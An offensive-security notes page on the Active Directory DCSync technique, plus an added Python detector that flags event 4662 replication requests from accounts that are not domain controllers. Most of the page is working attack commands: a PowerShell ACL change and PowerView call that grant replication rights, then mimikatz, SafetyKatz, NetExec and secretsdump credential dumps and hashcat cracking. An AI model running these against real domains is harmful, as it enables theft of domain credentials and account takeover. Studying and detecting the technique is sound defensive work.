DCSync
In Active Directory environments, multiple Domain Controllers (DCs) replicate data using the Directory Replication Service Remote Protocol (DRSR). The DCSync technique abuses this by impersonating a DC and requesting user credential data, in effect pulling ntds.dit contents over the network without code execution on a real DC. Critically, DCs do not authenticate the source of the replication request, only that the caller's SID has the necessary replication privileges.
To perform DCSync, an attacker must control an account with the following rights: Replicating Directory Changes, Replicating Directory Changes All, and sometimes Replication-Get-Changes-In-Filtered-Set. These are assigned by default to Domain Admins, Enterprise Admins, and built-in Administrators.
However, if you have WriteDACL over a privileged object, you can delegate these rights yourself. Notably, the Exchange Windows Permissions group often has DCSync rights in enterprise environments. For an example of leveraging WriteDACL to perform DCSync see Forest.
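The rights above are also the detection point. With directory service access auditing enabled on the domain object, every replication request, legitimate or DCSync, produces Security event 4662 whose Properties field lists the rightsGuids of the replication rights, so the check reduces to "replication right requested by a principal that is not a domain controller". The script below is an added defender-side example, not part of the original page; the event records, DC names and the in-memory record shape are constructed, with field names following the 4662 schema.

```python
import re
from dataclasses import dataclass

# rightsGuids of the replication control access rights. The first two are the
# GUIDs the manual ACL script on this page grants; the third is the
# filtered-set right the page names.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})", re.I)
CONTROL_ACCESS = 0x100  # Access Mask bit for "Control Access" (extended rights)

@dataclass
class Finding:
    subject: str
    rights: list

def dcsync_findings(events, dc_accounts):
    """One Finding per 4662 event that requests a replication right from a
    subject that is not a known domain-controller computer account."""
    findings = []
    for ev in events:
        mask = ev.get("AccessMask", 0)
        if isinstance(mask, str):          # real events carry "0x100" as text
            mask = int(mask, 16)
        if ev.get("EventID") != 4662 or not (mask & CONTROL_ACCESS):
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if not rights:
            continue
        # DCs replicate from each other all day; their computer accounts end in "$".
        subject = ev["SubjectUserName"]
        if subject.upper() in {d.upper() for d in dc_accounts}:
            continue
        findings.append(Finding(subject, rights))
    return findings

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x20",
     "Properties": "Write Property {bf967a86-0de6-11d0-a285-00aa003049e2}"},
]
KNOWN_DCS = {"DC01$", "DC02$"}  # constructed; take this from the Domain Controllers OU in practice

if __name__ == "__main__":
    for f in dcsync_findings(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"possible DCSync by {f.subject}: {', '.join(f.rights)}")
```

Feeding the function real records means parsing the 4662 XML (or a SIEM export) into the same dictionary shape; the DC allow-list should come from the Domain Controllers OU rather than a static set.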
Tools
We can enumerate who holds these rights on the domain object using an elevated CMD or PS session.
# Command Prompt
dsacls "DC=domain,DC=local"
# PowerShell
Get-DomainObjectAcl -Identity <USER> -Domain domain.local -ResolveGUIDs
We can assign DCSync rights manually or automatically using PowerView or DCSync.py.
The manual way is explained here.
# Manually
$acl = get-acl "ad:DC=domain,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# rightsGuid for the extended right Ds-Replication-Get-Changes
$objectguid = new-object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-acl -aclobject $acl "ad:DC=domain,DC=local"
# PowerView
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <USER> -Rights DCSync
Once the rights have been assigned, we can perform the attack with mimikatz.
# Mimikatz (PS script)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"'
# Mimikatz (binary)
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator
Finally, we can crack the hash using hashcat on our attacking machine.
hashcat -m 1000 hashes.dcsync rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule --force
We can assign DCSync rights using DCSync.py.
# DCSync.py
DCSync.py -dc domain.local -t 'CN=<USER>,CN=Users,DC=domain,DC=local' 'domain.local\<USER>:<PASS>'
We can also perform the attack with NetExec or Impacket's secretsdump script.
# NetExec
nxc smb 10.10.10.161 -u '<USER>' -p '<PASS>' --ntds --user administrator
# Impacket's secretsdump
impacket-secretsdump htb.local/hacker@10.10.10.161 -just-dc-user administrator
For an example of a DCSync attack using DCSync.py and secretsdump.py see here. For an example of a DCSync attack using NetExec see here.
SafetyKatz can be used to perform a DCSync attack:
.\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:dcorp\krbtgt" "exit"
Resources